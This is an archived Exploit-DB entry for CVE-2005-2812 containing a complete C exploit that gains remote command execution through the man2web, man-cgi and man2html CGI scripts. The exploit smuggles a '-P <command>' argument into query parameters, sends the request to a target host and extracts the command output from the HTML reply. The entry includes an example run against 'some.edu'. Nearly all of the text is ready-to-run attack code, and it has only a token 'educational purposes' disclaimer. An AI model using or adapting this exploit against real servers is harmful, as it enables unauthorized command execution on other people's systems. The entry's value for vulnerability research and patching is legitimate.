man2web <= 0.88 - Multiple Remote Command Execution Exploit update2

2005-09-04T00:00:00
ID EDB-ID:1194
Type exploitdb
Reporter tracewar
Modified 2005-09-04T00:00:00

Description

man2web <= 0.88 Multiple Remote Command Execution Exploit (update2). CVE-2005-2812. Webapps exploit for cgi platform

                                        
                                            /*
 * str0ke@server:~$ ./test some.edu "w" /cgi-bin/man2web 80 1
 * /str0ke
 */
 
 /* dl-mancgi.c v0.2
  * x86/linux multipie man2web cgi-scripts remote command spawn
  * found and coded by tracewar	(darklogic team)		 
  * for educaional purposes only.                                  
  *****************************************************************	
  * greetz goes to:						
  * matan peretz, ofer shaked, setuid, alex, majestic 
  */
 
 
 #include &lt;stdio.h&gt;
 #include &lt;sys/types.h&gt;
 #include &lt;sys/socket.h&gt;
 #include &lt;netinet/in.h&gt;
 #include &lt;netdb.h&gt;
 
 void usage(char *argv0) {
         fprintf(stderr, "x86/linux multipie man2web cgi-scripts remote command spawn\n");
 	fprintf(stderr, "researched by tracewar\n");
 	fprintf(stderr, "targets: \n0=man-cgi\n1=man2web\n2=man2html\n\n");
 	fprintf(stderr, "usage: %s &lt;remote_host&gt; &lt;command&gt; &lt;path&gt; &lt;http server port&gt; &lt;target&gt;\n", argv0);
         fprintf(stderr, "example:");
 	fprintf(stderr, " %s 1.2.3.4 w /cgi-bin/man-cgi 80 0\n",argv0);
         exit(0);
 }
 
 int main(int argc, char **argv) {
         int sock, i, j, len = 0;
         struct sockaddr_in serv_addr;
         struct hostent *crap;
 	char *cp, dummy[50000], buffer[2000] = "GET ";	
         if(argc &lt; 6)
            usage(argv[0]);
 	if(atoi(argv[5]) == 0) {
 			memset(dummy, 0x00, 50000);
 			strcat(dummy, argv[3]);
 			strcat(dummy, "?-P ");
 			strcat(dummy, argv[2]);
 			strcat(dummy, " ls");} 
 	else if(atoi(argv[5]) == 1) {
               		memset(dummy, 0x00, 50000);
              		strcat(dummy, argv[3]);
             	 	strcat(dummy, "?program=-P ");
            	        strcat(dummy, argv[2]);
            	        strcat(dummy, " ls");}
 	else if(atoi(argv[5]) == 2) {
 			memset(dummy, 0x00, 50000);
 			strcat(dummy, argv[3]);
 			strcat(dummy, "?section=-P");
 			strcat(dummy, argv[2]);
 			strcat(dummy, "&topic=w");}
 	else
 		usage(argv[0]);
 
 	printf("# crafting buffer string ... ");
          for(i=0, j=4;i &lt; strlen(dummy);i++) {
 		if(dummy[i] == ' ') {
 			strcat(buffer, "%20");
 			j+=3;}
 		else {
 			buffer[j] = dummy[i];
 			j++;}
 	}
         
 	strcat(buffer, "\r\n");
         printf("(done)\n");
         sock = socket(AF_INET, SOCK_STREAM, 0);
         if(sock &lt; 0)
                 return printf("# error creating socket.\n");
         crap = gethostbyname(argv[1]);
         if(crap == NULL)
                 return printf("# cant resolve the specified hostname: %s\n", argv[1]);
         else
                 printf("# connecting to victim... ");
 
         serv_addr.sin_family = AF_INET;
 	serv_addr.sin_port = htons(atoi(argv[4]));
         bcopy((char *)crap-&gt;h_addr, (char *)&serv_addr.sin_addr.s_addr, crap-&gt;h_length);
 
         if (connect(sock, &serv_addr, sizeof(serv_addr)) &lt; 0)
                 return printf("(error)\n# check again %s:%d\n", argv[1], atoi(argv[3]));
 
         printf("(done)\n# sending crafted string... ");
         if( (send(sock, buffer, strlen(buffer), 0)) == -1 )
                 return printf("\n# error while sending the crafted string.!\n");
         printf("(done)\n# waiting for our call ...\n");
 	memset(buffer, 0x00, 2000);
 	memset(dummy, 0x00, 50000);
 	printf("\n\n");
 	while(recv(sock, buffer, 2000, 0) &gt; 0)
 		strcat(dummy, buffer);
 
 	cp = &dummy[0];
 	i = 0; j = 0;
 	len = strlen(dummy);
 
         if(atoi(argv[5]) == 0) {
                 while(strncmp(cp, "&lt;hr&gt;", 4) && i &lt; len) {
                         cp++;
                         i++;
                 }
                 cp+=4;
                 while(strncmp(cp, "&lt;hr&gt;", 4) && strncmp(cp, "&lt;A", 2) && j &lt; len) {
 			j++;
                         cp++;
 		}
                 *cp = '\0';
                 cp = &dummy[0] + i + 4;
         }
 
         else if(atoi(argv[5]) == 1) {
                 while(strncmp(cp, "\&lt;pre\&gt;", 5) && i &lt; len) {
                         cp++;
                         i++;
                 }
                 cp+=4;
                 while(strncmp(cp, "pre", 3) && j &lt; len) {
 			j++;
                         cp++;
 		}
                 *cp = '\0';
                 cp = &dummy[0] + i + 6;
         }
 
         else if(atoi(argv[5]) == 2) {
                 while(strncmp(cp, "PRE", 3) && i &lt; len) {
                         cp++;
                         i++;
                 }
                 cp+=2;
                 while(strncmp(cp, "PRE", 3) && j &lt; len) {
 			j++;
                         cp++;
 		}
                 *cp = '\0';
                 cp = &dummy[0] + i + 2;
         }
 
 	if(*cp == '\0')
 		return printf("# Bad response from the server.\n");
 
         printf("%s", cp);
 	printf("\n\n");
         close(sock);
         return 0;
 }

// milw0rm.com [2005-09-04]